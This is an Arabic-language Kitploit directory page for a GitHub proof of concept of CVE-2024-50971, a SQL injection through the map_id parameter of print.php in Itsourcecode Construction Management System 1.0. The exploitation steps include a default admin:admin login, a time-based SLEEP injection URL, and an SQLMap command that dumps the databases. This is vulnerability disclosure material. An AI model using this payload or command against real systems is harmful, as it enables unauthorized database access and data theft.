Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50971 — إثبات مفهوم لـ CVE-2024-50971، وهي ثغرة حقن SQL في نظام إدارة البناء Itsourcecode 1.0، مع خطوات الاستغلال وأوامر SQLMap. | Kitploit
أدوات/GitHubGitHub/akhlak2511/cve-2024-50971
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن قواعد البيانات
GitHubakhlak2511/cve-2024-50971

CVE-2024-50971

إثبات مفهوم لـ CVE-2024-50971، وهي ثغرة حقن SQL في نظام إدارة البناء Itsourcecode 1.0، مع خطوات الاستغلال وأوامر SQLMap.

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50971

الوصف

تسمح ثغرة حقن SQL في ملف print.php الخاص بنظام إدارة الإنشاءات Itsourcecode الإصدار 1.0 للمهاجمين عن بُعد بتنفيذ أوامر SQL تعسفية عبر المعامل map_id.

نوع الثغرة

حقن SQL

البائع

Itsourcecode

قاعدة الكود المتأثر:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

المكون المتأثر:

نظام إدارة الإنشاءات Itsourcecode v1.0 معرض لحقن SQL من خلال المعامل map_id في صفحة print.php.

نواقل الهجوم:

  1. قم بإعداد التطبيق محليًا، وسجل حسابًا، ثم سجل الدخول باستخدام بيانات المشرف admin:admin
  2. انتقل إلى عنوان URL التالي في متصفحك: http://localhost/monitoring_system/print.php?map_id=67
  3. حقن حمولة SQL: قم بتعديل المعامل map_id في عنوان URL لإدراج حمولة حقن SQL زمنية. http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
  • لاحظ استجابة التطبيق: يجب أن يستغرق تحميل الصفحة وقتًا أطول بشكل ملحوظ (15 ثانية) إذا كان الحقن ناجحًا، مما يؤكد أن المعامل map_id معرض لحقن SQL.
  • استخدم الآن أداة SQLMap لمزيد من الاستغلال وتفريغ قواعد البيانات باستخدام الأمر التالي: sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • المراجع:

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    تنزيل الأداة